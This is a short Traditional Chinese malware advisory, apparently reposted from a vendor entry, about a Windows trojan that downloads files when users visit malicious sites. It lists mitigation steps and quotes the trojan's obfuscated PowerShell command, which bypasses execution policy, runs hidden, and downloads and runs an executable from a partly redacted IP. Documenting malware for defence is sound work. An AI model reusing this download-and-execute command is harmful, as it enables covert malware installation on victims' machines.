Trojan.JS.NEMTY.THBBHBO 木馬程式在瀏覽惡意網站時會下載惡意檔案至電腦上

風險 等級: 低度威脅
摘   要:

防毒軟體廠商近期發現 Trojan.JS.NEMTY.THBBHBO 木馬程式,利用在瀏覽惡意網站時在未發覺情形下載惡意檔案。

影響 系統:
  • Windows
解決 辦法:

若不慎已感染此病毒,建議處理方式如下:

1、阻擋所有外部可疑連線
2、使用密碼將檔案加密
3、不要給予使用者與程式過高的權限來執行工作
4、取消自動撥放 (AutoPlay) 避免在網路上自動執行檔案
5、關閉藍芽與檔案分享功能,如需要則使用權限控管名單 (Access Control List) 或 密碼 (password) 來存取:
6、一旦有電腦被感染,立刻將其隔離
7、如果以上步驟仍無法順利清除病毒,建議您參考以下防毒廠商提供之步驟處理:
細節 描述:

該木馬以其他惡意軟體丟棄的文件或用戶訪問惡意站點時在不知不覺中下載的文件 的形式到達系統。

安裝

該木馬添加了以下過程:

  • “%System%\cmd.exe” /c hMLWtlbsdHkTjom & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1=\’\’Net.W\’\’; $v2=\’\’ebClient\’\’; $var = (New-Object $v1$v2); $var.Headers[\’\’User-Agent\’\’] = \’\’Google Chrome\’\’; $var.downloadfile(\’\’http://{BLOCKED}.{BLOCKED}.197.190/nnn.exe\’\’,\’\’%temp%erb19.exe\’\’); & %temp%erb19.exe & OWNHgawUJSfreRD

    下載例程

    該木馬程式連接到以下網站,以下載並執行惡意文件:
  • http:// {BLOCKED}。{BLOCKED} .197.190 / nnn.exe

    它從以下URL下載文件,然後在存儲在受影響的系統中之前重命名它們:
  • %User Temp%erb19.exe
參考 資訊: trendmicro (2020/03/24)

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *